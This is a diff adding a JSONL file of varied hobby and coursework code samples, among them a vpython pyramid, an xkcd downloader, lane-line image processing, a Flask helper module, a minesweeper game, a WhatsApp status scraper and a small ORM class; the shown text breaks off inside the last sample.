diff --git "a/2195.jsonl" "b/2195.jsonl"
new file mode 100644
--- /dev/null
+++ "b/2195.jsonl"
@@ -0,0 +1,544 @@
+{"seq_id":"304289132","text":"#!/usr/bin/env python3\n#\nfrom vpython import *\n#\nscene.title='Octagonal Pyramid'\nscene.width=1000\nscene.height=600\nscene.background=vector(1,1,1)\ndistant_light(direction=vec(1,2,1),color=vec(0.8,0.8,0.8))\ndistant_light(direction=vec(1,-2,1),color=vec(0.8,0.8,0.8))\n#\ncol=vector(0.7,0.4,0)\npz=[]\npx=[]\ntria=[]\nalpha=pi/4\nyy=-1\nfor i in range(8):\n    beta=i*alpha\n    zz=cos(beta)\n    xx=sin(beta)\n    pz.append(zz)\n    px.append(xx)\nc=vertex(pos=vec(0,1.5,0),color=col)\nd=vertex(pos=vec(0,-1,0),color=col)\nd.normal=vec(0,-1,0)\nfor i in range(8):\n    j=(i+1)%8\n    al=vertex(pos=vec(px[i],yy,pz[i]),color=col)\n    ab=vertex(pos=vec(px[i],yy,pz[i]),color=col)\n    bl=vertex(pos=vec(px[j],yy,pz[j]),color=col)\n    bb=vertex(pos=vec(px[j],yy,pz[j]),color=col)\n    ab.normal=vec(0,-1,0)\n    bb.normal=vec(0,-1,0)\n    trb=triangle(v0=ab,v1=bb,v2=d)\n    lnorm=((bl.pos-al.pos).cross(c.pos-bl.pos)).norm()\n    al.normal=lnorm\n    bl.normal=lnorm\n    c.normal=lnorm\n    trl=triangle(v0=al,v1=bl,v2=c)\n    tria.append(trl)\n    tria.append(trb)\n\n\n\n\n\n","sub_path":"olp_sem6/OtherPrograms/OctaPyram.py","file_name":"OctaPyram.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"514149998","text":"#! python3\r\n# -*- coding: utf-8 -*-\r\n\r\n# 演習プロジェクト 15.12.2 \r\n# downloadXkcd2.py - XKCDコミックをひとつずつダウンロードする\r\n# ただし、前回の差分のみをダウンロードし、\r\n# デスクトップにもコピーする。\r\n\r\nimport requests, os, bs4\r\nimport time\r\nimport shutil\r\n\r\ndesktop = 'C:/Users/YOUR_ID/Desktop' # デスクトップのパスを指定してください\r\n\r\nurl = 'http://xkcd.com/' # 開始URL\r\nos.makedirs('xkcd', exist_ok=True) # ./xkcdに保存する\r\n\r\nwhile not url.endswith('#'):\r\n    # ページをダウンロードする\r\n    print('ページをダウンロード中 {}...'.format(url))\r\n    res = requests.get(url)\r\n    res.raise_for_status()\r\n\r\n    soup = bs4.BeautifulSoup(res.text, \"lxml\")\r\n\r\n    # コミック画像のURLを見つける\r\n    comic_elem = soup.select('#comic img')\r\n    if comic_elem == []:\r\n        print('コミック画像が見つかりませんでした。')\r\n    else:\r\n        comic_url = 'http:' + comic_elem[0].get('src')\r\n        filename = os.path.join('xkcd', os.path.basename(comic_url))\r\n        # ファイルが存在しない場合に限り、ダウンロードする\r\n        if not os.path.exists(filename):\r\n            # 画像をダウンロードする\r\n            print('画像をダウンロード中 {}...'.format(comic_url))\r\n            res = requests.get(comic_url)\r\n            res.raise_for_status()\r\n\r\n            # 画像を./xkcdに保存する\r\n            image_file = open(filename, 'wb')\r\n            for chunk in res.iter_content(100000):\r\n                image_file.write(chunk)\r\n            image_file.close()\r\n\r\n            # デスクトップにコピーする\r\n            shutil.copy(filename, desktop)\r\n\r\n    # PrevボタンのURLを取得する\r\n    prev_link = soup.select('a[rel=\"prev\"]')[0]\r\n    url = 'http://xkcd.com' + prev_link.get('href')\r\n\r\n    time.sleep(20)\r\n\r\nprint('完了')\r\n","sub_path":"practice_pj/practice_projects/ch15/downloadXkcd2.py","file_name":"downloadXkcd2.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"108298418","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\nclass Student(object):\n\n    @property # @property 使得 sname 变成了属性\n    def sname(self):\n        return self._name\n\n    @sname.setter # 注意这里是 sname.setter 而不是 property.setter\n    def sname(self,value): # 这里也叫 sname 但调用的时候,赋值才调用本函数\n        self._name = value\n\n\ns1 = Student()\ns1.sname = \"zhangsan\"\n\ns2 = Student()\ns2.sname = 
\"lisi\"\n\nprint(s1.sname)\nprint(s2.sname)\n","sub_path":"oop/demo2/demo3.py","file_name":"demo3.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"27980579","text":"import json\n\nfrom django.db.models import Max, Min\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom datetime import timedelta\n\n# Create your views here.\nfrom sale.models import Invoice\n\n\ndef sales_ajax(request):\n if request.is_ajax():\n last_date = Invoice.objects.all().aggregate(Max('created_at'))['created_at__max']\n start_date = Invoice.objects.all().aggregate(Min('created_at'))['created_at__min']\n days = []\n sales = []\n counter = 1\n moving_date = start_date\n while moving_date <= last_date:\n present_date = moving_date\n moving_date = moving_date + timedelta(days=1)\n invoices = Invoice.objects.filter(created_at__gte=present_date, created_at__lt=moving_date)\n sum = 0\n for invoice in invoices:\n sum += invoice.paid_amount\n sales.append(sum)\n days.append(str(present_date))\n data = json.dumps({'dates': days, 'sales': sales})\n return HttpResponse(data, content_type='application/json; charset=utf8')\n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"592400578","text":"import os\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2\n\n############################################\nprint('Current dir: ' + os.getcwd())\ntest_img_fn = 'whiteCarLaneSwitch.jpg'\nimage = mpimg.imread('test_images/' + test_img_fn)\n\nprint('This image is :', type(image),\n'with dimensions (height, width, color depth): ', image.shape)\nysize, xsize = image.shape[0], image.shape[1]\n\n############################################\ndef region_of_interest_img(img):\n # create a 'region of interest' mask\n region_img = np.copy(img)\n not_region_img = np.copy(img)\n # select 3 points on the image at the vertices of the region of interest\n # point = [x, y] coordinates in the image\n # image is 960 x 540 (width x height), using image coordinate system\n left1 = [450, 300]\n left2 = [100, 539]\n top1 = [0, 325]\n top2 = [959, 325]\n right1 = [0, 0]\n right2 = [959, 539]\n\n # fit lines to identify a 3 sided region of interest\n poly_degree = 1\n\n fit_left = np.polyfit((left1[0], left2[0]), (left1[1], left2[1]), poly_degree)\n fit_top = np.polyfit((top1[0], top2[0]), (top1[1], top2[1]), poly_degree)\n fit_right = np.polyfit((right1[0], right2[0]), (right1[1], right2[1]), poly_degree)\n\n XX, YY = np.meshgrid(np.arange(0, xsize), np.arange(0, ysize))\n\n left_edge = (YY < (XX*fit_left[0] + fit_left[1]))\n top_edge = (YY < (XX*fit_top[0] + fit_top[1]))\n right_edge = (YY < (XX*fit_right[0] + fit_right[1]))\n\n # pixels outside the region of interest are set to black\n region_thresholds = top_edge\n region_img[region_thresholds] = [0, 0, 0]\n region_thresholds = left_edge\n region_img[region_thresholds] = [0, 0, 0]\n region_thresholds = right_edge\n region_img[region_thresholds] = [0, 0, 0]\n\n # pixels inside the region of interest are set to black\n region_thresholds = top_edge\n not_region_img[~top_edge & ~left_edge & ~right_edge] = [0, 0, 0]\n\n return region_img, not_region_img\n\ndef color_threshold_img(img, red_threshold, green_threshold, blue_threshold):\n color_threshold_img = np.copy(img)\n\n # set thresholds\n 
rgb_threshold = [red_threshold, green_threshold, blue_threshold]\n\n # create a mask that sets pixels to red if the value is greater than any of the thresholds\n color_thresholds = (img[:, :, 0] > rgb_threshold[0]) \\\n | (img[:, :, 1] > rgb_threshold[1]) \\\n | (img[:, :, 2] > rgb_threshold[2])\n\n # color_threshold_img[color_thresholds] = [0, 0, 0]\n color_threshold_img[color_thresholds] = [255, 0, 0]\n return color_threshold_img\n\n############################################\nregion_img, not_region_img = region_of_interest_img(image)\nprocessed_img = color_threshold_img(region_img, 175, 175, 175)\nplt.imshow(processed_img)\nplt.show()\n\ncombined_img = cv2.addWeighted(processed_img, 1.0, not_region_img, 1.0, 0)\n\nplt.imshow(combined_img)\n# plt.show()\nfn = test_img_fn\nplt.savefig('./output_images/basic/' + test_img_fn, dpi = 300)\n\n\n","sub_path":"src/simple-lane-lines/lane_line_basic_images.py","file_name":"lane_line_basic_images.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"498804440","text":"import requests\nimport urllib.parse\n\nfrom flask import redirect, render_template, request, session\nfrom functools import wraps\nfrom operator import itemgetter\n\n\ndef apology(message, code=400):\n \"\"\"Render message as an apology to user.\"\"\"\n def escape(s):\n \"\"\"\n Escape special characters.\n\n https://github.com/jacebrowning/memegen#special-characters\n \"\"\"\n for old, new in [(\"-\", \"--\"), (\" \", \"-\"), (\"_\", \"__\"), (\"?\", \"~q\"),\n (\"%\", \"~p\"), (\"#\", \"~h\"), (\"/\", \"~s\"), (\"\\\"\", \"''\")]:\n s = s.replace(old, new)\n return s\n return render_template(\"apology.html\", top=code, bottom=escape(message)), code\n\n\ndef login_required(f):\n \"\"\"\n Decorate routes to require login.\n\n http://flask.pocoo.org/docs/1.0/patterns/viewdecorators/\n \"\"\"\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if session.get(\"user_id\") is None:\n return redirect(\"/login\")\n return f(*args, **kwargs)\n return decorated_function\n\ndef is_valid_mail(email):\n #simple and easy checking only for some formatting elements, not checking smtps regexes\n\n atPos = email.find(\"@\")\n\n if atPos > 0 and atPos < len(email) - 2:\n\n if email.count(\"@\") > 1:\n return False\n\n else:\n return True\n\n else:\n return False\n\ndef get_hours(startend):\n #generates a list of strings of time_labels of half ours for input select menu\n hours = []\n\n if startend == \"start\" or startend == \"end\":\n\n for i in range(24):\n hours.append(f\"{i:02d}\"+\":00\")\n hours.append(f\"{i:02d}\"+\":30\")\n\n if startend == \"end\":\n hours.pop(0)\n hours.append(\"24:00\")\n\n return hours\n\ndef schedule_mapper(schedule):\n #maps the schedule from a dict to a list, where a list element's index corresponds to html table cells\n #converts the sql data and create a list of 48 elements corresponding to 48 segments of half ours\n myList = [None] * 48\n\n if not schedule:\n return myList\n\n for elements in schedule:\n startpos = elements[\"start\"]\n\n endpos = elements[\"end\"]\n\n dif = endpos - startpos\n\n myList[startpos] = elements[\"title\"]\n\n if dif > 1:\n for i in range(1, dif):\n myList[startpos + i] = \"-\"\n\n return myList\n\ndef lod_sorter(lod, sortingValue):\n #sorts a list of dict(lod) on a string keyword provided(sortingValue)\n newList = []\n\n if not lod or not sortingValue:\n return newList\n\n newList = sorted(lod, key = itemgetter(sortingValue))\n\n return 
newList\n\n\n\n\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"286953962","text":"import tkinter\n# aprendendo a usar message\nroot = tkinter.Tk()\nroot.title(\"Aplicação\")\nroot.geometry('400x300')\n# criando a Message\nt = tkinter.Message(root, text='Esse é o texto do widget message.', width=200)\nt.grid()\n\nroot.mainloop()","sub_path":"tkinter/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"114470829","text":"from library.crud.scheme_validator import SchemeObject, SchemeString, SchemeBoolean, SchemeList, SchemeNumber\nfrom scheme.several import SCHEME_HEADER\n\nSCHEME_POLICIES = SchemeObject(\n required=True,\n dict_pairs={\n 'version': SchemeString(True, '\\d\\.\\d\\.\\d'),\n 'active': SchemeBoolean(True),\n 'comments': SchemeString(False),\n 'hash': SchemeString(True),\n }\n)\n\nSCHEME_POLICIES_ACCEPT = SchemeObject(\n required=True,\n dict_pairs={\n 'name': SchemeString(True, '.+'),\n 'headers': SchemeList(True, SCHEME_HEADER),\n 'version': SchemeString(True, '\\d\\.\\d\\.\\d'),\n 'accepted': SchemeBoolean(True),\n 'read': SchemeBoolean(True),\n 'seconds_to_read': SchemeNumber(True, False)\n }\n)\n","sub_path":"backend_apps/scheme/policies.py","file_name":"policies.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"338370399","text":"import snap\nimport matplotlib.pyplot as plt\n\ndef loadGraph():\n\tG1 = snap.LoadEdgeList(snap.PUNGraph, \"/home/hieu/data/ttpt/project/facebook_large/musae_facebook_edges.csv\", 0, 1, ',')\n\tsnap.DelSelfEdges(G1)\n\treturn G1\n\ndef CNM_Graph(G1):\n\tCmtyV = snap.TCnComV()\n\tmodularity = snap.CommunityCNM(G1, CmtyV)\n\tcount = 0\n\tsizes = []\n\tcommunities = []\n\tfor Cmty in CmtyV:\n\t listcmty = []\n\t for NI in Cmty:\n\t listcmty.append(NI)\n\n\t communities.append(listcmty)\n\t count += 1\n\t sizes.append(len(listcmty))\n\n\treturn sizes, communities , modularity, count\n\n# plot histogram of community sizes\ndef plot_community(sizes):\n\tsizes.sort()\n\tplt.hist(sizes, log=True)\n\tplt.xlabel(\"Size of community\")\n\tplt.ylabel(\"Number of communities\")\n\tplt.title(\"Sizes of CNM communities\")\n\tplt.show()\n\tplt.savefig(\"cnm-sizes.png\")\n\t\nif __name__ == '__main__':\n\tG1 = loadGraph()\n\tsizes, communities, modularity, count = CNM_Graph(G1)\n\tplot_community(sizes)\n\n\tprint(\"Number of communities:\", count)\n\tprint(\"Largest community:\", max(sizes))\n\tprint(\"Smallest community:\", min(sizes))\n\tprint(\"The modularity of the network is %f\" % modularity)\n\n# Number of communities: 153\n# Largest community: 4487\n# Smallest community: 2\n# The modularity of the network is 0.729481\n","sub_path":"CNM.py","file_name":"CNM.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"283576138","text":"#ex3_1\n# Enter Hours:45\n# Enter Rate: 10\n# pay: 475.0\nThours=int(input('Enter Total Hours: '))\nTrate=int(input('Enter Your Hourly Pay Rate: '))\nRegHours=40\nif Thours > RegHours:\n\tpaycomputation=((Thours-RegHours)*.5*Trate)+(Thours*Trate)\nelse: 
\n\tpaycomputation=Thours*Trate\nprint(paycomputation)\n\t\n","sub_path":"ex3_1.py","file_name":"ex3_1.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"28020297","text":"# splitter\n# Created by JKChang\n# 12/01/2018, 13:13\n# Tag:\n# Description:\n\n# email = []\n# psw = []\n# with open('/Users/jkchang/Desktop/email.txt') as file:\n# lines = file.readlines()\n# for line in lines:\n# res = line.strip().split('----')\n# email.append(res[0])\n# psw.append(res[1])\n#\n# print('\\n'.join(email))\n\n\ncode = []\n\npsw = []\ns = 0\nlinecount = 0\nwith open('/Users/jkchang/Desktop/codes.txt') as file:\n lines = file.readlines()\n for line in lines:\n linecount += 1\n res = line.strip().split(' ')\n code.append(res[0] + res[1])\n psw.append(res[2])\n s += int(res[0])\n if (linecount % 10 == 0):\n code.append(' ')\n psw.append(' ')\n\nprint('\\n'.join(code))\nprint('\\n'.join(psw))\nprint(s)\n","sub_path":"CJK/temp/splitter.py","file_name":"splitter.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"321078837","text":"import minesweeper as ms\nimport sys\nimport config\n\n\ndef launch(width, height, bombs):\n \"\"\"\n launch the game\n :param width: width of the game\n :type width: int\n :param height: height of the game\n :type height: int\n :param bombs: number of bombs\n :type bombs: int\n \"\"\"\n game = ms.make_game(width, height, bombs)\n state = ms.get_state(game)\n while state == ms.GameState.running:\n try:\n display_game(game)\n play(game)\n state = ms.get_state(game)\n except KeyboardInterrupt:\n sys.exit()\n display_game(game)\n if state == ms.GameState.losing:\n print(\"You lose!\")\n elif state == ms.GameState.wining:\n print(\"You win!\")\n else:\n print(\"an unexpected error has occured\")\n\n\ndef play(game):\n \"\"\"\n require action to the player and execute it\n :param game: game\n :type game: a minesweeper game\n :return: None\n :rtype: NoneType\n :UC: none\n \"\"\"\n action = keyboard_input(game)\n x = action[0]\n y = action[1]\n a = action[2]\n if a == 'R':\n ms.reveal_cell(game, x, y)\n elif a == 'S':\n cell = ms.get_cell(game, x, y)\n ms.set_flag(cell)\n elif a == 'U':\n cell = ms.get_cell(game, x, y)\n ms.unset_flag(cell)\n\n\ndef keyboard_input(game):\n \"\"\"\n :param game: game\n :type game: a minesweeper game\n :return: the player input action\n :rtype: tuple of the action (posX, posY, action)\n :UC: none\n \"\"\"\n try:\n data_in = input(\"Your play x,y,C with x=line, y=row, C=(R)eval,(S)et flag,(U)nset flag): \")\n ldata = data_in.split(',')\n x = int(ldata[0])\n y = int(ldata[1])\n c = ldata[2].upper()\n if x < 0 or x >= ms.get_height(game) \\\n or y < 0 or y >= ms.get_width(game)\\\n or c not in ['R', 'S', 'U']:\n raise ValueError\n return (x, y, c)\n except IndexError:\n print ('There must be two numbers and one letter separated by a comma (,)')\n keyboard_input(game)\n except TypeError:\n print ('There must be two numbers and one letter separated by a comma (,)')\n keyboard_input(game)\n except ValueError:\n print (\"x and y must be integers and c must be R or S or U\")\n keyboard_input(game)\n\n\ndef display_game(game):\n \"\"\"\n display the game in stdout\n :param game: game\n :type game: a minesweeper game\n :return: None\n :rType: NoneType\n :UC: none\n \"\"\"\n height = ms.get_height(game)\n width = ms.get_width(game)\n display_line = \"+---\" * width\n 
display_line += \"+\"\n to_print = \" \"\n for i in range(width - 1):\n to_print += \" \" + str(i)\n to_print += \" \" + str(width - 1) + '\\n'\n for h in range(height):\n to_print += \" \" + display_line + '\\n'\n to_print += str(h)\n for l in range(width):\n character = \" \"\n cell = ms.get_cell(game, h, l)\n if ms.is_revealed(cell):\n if ms.is_bomb(cell):\n character = \"B\"\n else:\n character = ms.number_of_bombs_in_neighborhood(cell)\n elif ms.is_flaged(cell):\n character = \"?\"\n to_print += \" | \" + str(character)\n to_print += \" |\\n\"\n to_print += \" \" + display_line + \"\\n\"\n print(to_print)\n\n\nif __name__ == '__main__':\n try:\n config_file = sys.argv[1]\n except IndexError:\n launch(10, 10, 10)\n else:\n h, w, b = config.rescue_basic_config(config_file)\n launch(w, h, b)\n","sub_path":"src/console_interface.py","file_name":"console_interface.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"272132963","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport time\n\nfrom functions import write_data_to_file, get_last_timestamp\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('--user-data-dir=./User_Data')\ndriver = webdriver.Chrome(\n 'E:\\\\MegaSyncHP\\\\Sync\\\\Code\\\\python\\\\webdriver\\\\chromedriver.exe', chrome_options=options)\ndriver.get(\"https://web.whatsapp.com/\")\nwait = WebDriverWait(driver, 600)\n\n\ndef get_status():\n\n messages = []\n\n WebDriverWait(driver, 30).until(EC.element_to_be_clickable((\n By.XPATH, '//*[@id=\"side\"]/header/div[2]/div/span/div[1]/div'))).click()\n print(\"Opening Status page...\")\n\n time.sleep(5)\n WebDriverWait(driver, 30).until(EC.element_to_be_clickable((\n By.CLASS_NAME, '_3ko75'))).click()\n\n while True:\n try:\n message = driver.find_element_by_xpath(\n '//*[@id=\"app\"]/div/span[3]/div/span/div[2]/div/span/div/div/div/div[5]/div/span').text\n\n timestamp_txt = driver.find_element_by_xpath(\n '//*[@id=\"app\"]/div/span[3]/div/span/div[2]/div/span/div/div/div/div[2]/div[2]/div').text\n\n log = timestamp_txt[-5:] + \"...[\" + message[:25] + \"]\\n\"\n\n write_data_to_file('files/app.log', log)\n write_data_to_file(\n 'files/messages.txt', timestamp_txt[-5:] + \"...\\n\" + message + '\\n\\n')\n\n print(\"Message downloaded.\")\n # Go to next\n driver.find_element_by_class_name('_3THFw').click()\n\n except:\n break\n finally:\n pass\n\n driver.close()\n return messages\n\n\nget_status()\n","sub_path":"Whatsapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"419941113","text":"import logging\nfrom Util import Util\n\n\nclass InferenceValidator:\n cur = None\n\n root = logging.getLogger()\n\n def __init__(self, cur):\n self.cur = cur\n\n def validate(self, ssid, circuits, boundary, voltage_levels):\n num_stations = self.num_stations(circuits)\n logging.info('In total %d stations covered with the inference', num_stations)\n sql = \"select distinct(unnest(get_stations(r.parts))) from planet_osm_rels r, planet_osm_polygon s1\"\n sql += \", planet_osm_polygon s2\" if boundary is not None else \"\"\n sql += \" where s1.osm_id = \" 
+ str(ssid) + \" and s1.power ~ 'substation|station|sub_station' and s1.voltage ~ '\" + voltage_levels + \"' and ARRAY[s1.osm_id]::bigint[] <@ r.parts\"\n if boundary is not None:\n sql += \" and (s2.power ~ 'substation|station|sub_station' and s2.voltage ~ '220000|380000' or s2.power ~ 'generator|plant') and ARRAY[s2.osm_id]::bigint[] <@ r.parts and st_within(s2.way, st_transform(st_geomfromtext('\" + boundary.wkt + \"',4269),3857))\"\n self.cur.execute(sql)\n result = self.cur.fetchall()\n if not result:\n logging.info('No existing relation found for station %s', str(ssid))\n return None\n not_hit_stations = []\n hits = 0\n for (station,) in result:\n station_hit = False\n for circuit in circuits:\n if station == circuit.members[0].id or station == circuit.members[-1].id:\n hits += 1\n station_hit = True\n break\n if not station_hit:\n not_hit_stations.append(station)\n logging.info('Found %d of %d connected stations to %s', hits, len(result), str(ssid))\n logging.info('Not hit stations: %s', str(not_hit_stations))\n return hits * 1.0 / len(result)\n\n def validate2(self, circuits, stations_dict, boundary, voltage_levels):\n\n logging.info(\"Starting inference validation\")\n sql = \"select distinct(id), get_stations(r.parts), hstore(r.tags)->'voltage' from planet_osm_rels r, planet_osm_polygon s1, planet_osm_polygon s2\"\n sql += \" where (s1.power ~ 'substation|station|sub_station' and s1.voltage ~ '\" + voltage_levels +\"' or s1.power ~ 'generator|plant') and ARRAY[s1.osm_id]::bigint[] <@ r.parts and st_within(s1.way, st_transform(st_geomfromtext('\" + boundary.wkt + \"',4269),3857))\"\n sql += \" and (s2.power ~ 'substation|station|sub_station' and s2.voltage ~ '\" + voltage_levels + \"' or s2.power ~ 'generator|plant') and ARRAY[s2.osm_id]::bigint[] <@ r.parts and st_within(s2.way, st_transform(st_geomfromtext('\" + boundary.wkt + \"',4269),3857))\"\n sql += \" and s1.osm_id <> s2.osm_id and hstore(r.tags)->'route'='power'\"\n self.cur.execute(sql)\n result = self.cur.fetchall()\n num_eligible_relations = len(result)\n hits = 0\n not_hit_connections = []\n for (id, station_ids, voltage) in result:\n if voltage is None or int(voltage) < 220000:\n sql = \"select parts from planet_osm_rels where id = \" + str(id)\n self.cur.execute(sql)\n result2 = self.cur.fetchall()\n for (parts,) in result2:\n for part in parts:\n sql = \"select hstore(tags)->'voltage' from planet_osm_ways where id = \" + str(part)\n self.cur.execute(sql)\n result3 = self.cur.fetchall()\n if not result3:\n voltage = None\n continue\n [(part_voltage,)] = result3\n if part_voltage is None:\n voltage = None\n continue\n if ';' not in part_voltage and ',' not in part_voltage and int(part_voltage) >= 220000:\n voltage = part_voltage\n break\n\n if voltage is None:\n logging.debug(\"Could not determine voltage of relation\")\n num_eligible_relations -= 1\n continue\n\n relation_covered = False\n num_hit_p2p_connections = 0\n for circuit in circuits:\n if Util.have_common_voltage(circuit.voltage, voltage):\n station1 = circuit.members[0]\n station1_connected_stations = InferenceValidator.find_connected_stations(stations_dict, voltage, station1.connected_stations[voltage], set([station1.id]))\n index1 = 0\n index2 = index1 + 1\n while index2 < len(station_ids):\n if station_ids[index1] in station1_connected_stations and station_ids[index2] in station1_connected_stations:\n num_hit_p2p_connections += 1\n index1 += 1\n index2 = index1 + 1\n if num_hit_p2p_connections == len(station_ids) - 1:\n relation_covered = True\n 
break\n if relation_covered:\n hits += 1\n else:\n not_hit_connections.append(id)\n hit_rate = hits * 1.0 / num_eligible_relations\n logging.info('Found %d of %d eligible point-to-point connections (%.2lf)', hits, num_eligible_relations, hit_rate)\n logging.info('Not hit point-to-point connections: %s', str(not_hit_connections))\n\n @staticmethod\n def find_connected_stations(stations, voltage, connected_stations, covered_stations):\n for station_id in connected_stations.difference(covered_stations):\n covered_stations.add(station_id)\n connected_stations.update(InferenceValidator.find_connected_stations(stations, voltage, stations[station_id].connected_stations[voltage], covered_stations))\n return connected_stations\n\n def num_stations(self, circuits):\n stations = set()\n stations.clear()\n for circuit in circuits:\n stations.add(circuit.members[0])\n stations.add(circuit.members[-1])\n return len(stations)","sub_path":"code/InferenceValidator.py","file_name":"InferenceValidator.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"330018450","text":"# -*- coding: utf-8 -*-\n# @Author : DevinYang(pistonyang@gmail.com)\n__all__ = ['LabelSmoothingLoss']\n\nimport torch\nfrom torch import nn\nfrom .functional import smooth_one_hot\n\n\nclass LabelSmoothingLoss(nn.Module):\n \"\"\"This is label smoothing loss function.\n \"\"\"\n\n def __init__(self, classes, smoothing=0.0, dim=-1):\n super(LabelSmoothingLoss, self).__init__()\n self.confidence = 1.0 - smoothing\n self.smoothing = smoothing\n self.cls = classes\n self.dim = dim\n\n def forward(self, pred, target):\n pred = pred.log_softmax(dim=self.dim)\n true_dist = smooth_one_hot(target, self.cls, self.smoothing)\n return torch.mean(torch.sum(-true_dist * pred, dim=self.dim))\n","sub_path":"torchtoolbox/nn/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"137607119","text":"#!/usr/bin/env python3.4\n# -*- coding: utf-8 -*-\n''' This class is only a model, to use it is necessary to extend it, and add\nthe table proprieties such name, columns, primary keys, etc...\nThe _columns atribute have to be initiated in the __init__(self, connection)\nmethod, and when overwrite this method, is necessary execute the parent init\nfirst:\n parent().__init__(connection)\n'''\n\nimport datetime\nimport copy\n\n\nclass DbTable:\n ''' Basic class ORM like to manage the table objects and data '''\n _table_name = '' # Table name\n _primary = [] # primary key name\n _children_tables = {} # tablename\n _foreigh_keys = {} # {keyname : tablename.collumnname}\n _conn = None\n\n def __init__(self, connection):\n ''' the table object have to receive a conncetion object to be\n initiated '''\n self._columns = {} # {cname: {value:\"\", type: \"\", default:\"\" }}\n # if default = 'AUTO' the column will be autoincrement\n if connection is connection:\n self._conn = connection\n self._queued_to_save = False # if true, not permit to change values\n\n def set_value(self, cname, cvalue):\n ''' table.set_value(field_name, value) - add a value to field '''\n if not self._queued_to_save:\n if cname in self._columns.keys():\n if (isinstance(cvalue, self._columns[cname]['type']) or\n (isinstance(cvalue, int) and\n self._columns[cname]['type'] == bool)):\n self._columns[cname]['value'] = cvalue\n else:\n raise TypeError('Incorrect value type.')\n else:\n raise 
Exception('The column ' + cname + ' is not found.')\n else:\n raise Exception(\n 'Object queued to save, the values are readonly until save.')\n\n def get_value(self, cname):\n ''' table.get_value(field_name) - return the field value '''\n if cname in self._columns:\n return self._columns[cname]['value']\n return None\n\n def get_values(self, conj_cname):\n ''' '''\n values = {}\n if cname in conj_cname:\n value = self.get_value(cname)\n if value:\n values[cname] = value\n return values\n\n def find(self):\n ''' table.find()\n Does a search in the table and return the first row that match with\n the values in the object values set with\n table.set_value('cname', value) '''\n\n select_query = {}\n for key, value in self._columns.items():\n if str(value['default']).upper() not in ['AUTO', 'AUTOINCREMENT'\n ] or value['value']:\n select_query[key] = value['value']\n cursor = self._select_query(select_query)\n result = cursor.fetchone()\n if result:\n headers = {\n idx: desc[0]\n for idx, desc in enumerate(cursor.description)\n }\n for index, value in enumerate(result):\n self.set_value(headers[index], value)\n return True\n return False\n\n def list(self, query={}):\n ''' table.find({'field_name1':value1, 'field_name2': value2})\n Does a search in the table for the values and populate the return a\n list of table objects '''\n cursor = self._select_query(query)\n object_list = []\n headers = {idx: desc[0] for idx, desc in enumerate(cursor.description)}\n for i, row in enumerate(cursor.fetchall()):\n object_list.append(self.__class__(self._conn))\n for index, value in enumerate(row):\n object_list[i].set_value(headers[index], copy.copy(value))\n return object_list\n\n def save(self):\n ''' Save the values to table '''\n if not self._queued_to_save: # if not queued, lets queue!\n self.queue_to_save()\n self._conn.commit()\n self._queued_to_save = False # commited\n self.find()\n return self.get_value(self._primary[0])\n\n def queue_to_save(self):\n '''Insert os update a table tuple value '''\n columns = []\n values = []\n select_query = {}\n for key, value in self._columns.items():\n if str(value['default']).upper() not in ['AUTO', 'AUTOINCREMENT'\n ] or value['value']:\n columns.append(key)\n values.append(value['value'])\n select_query[key] = value['value']\n\n placeholders = ','.join(['?' 
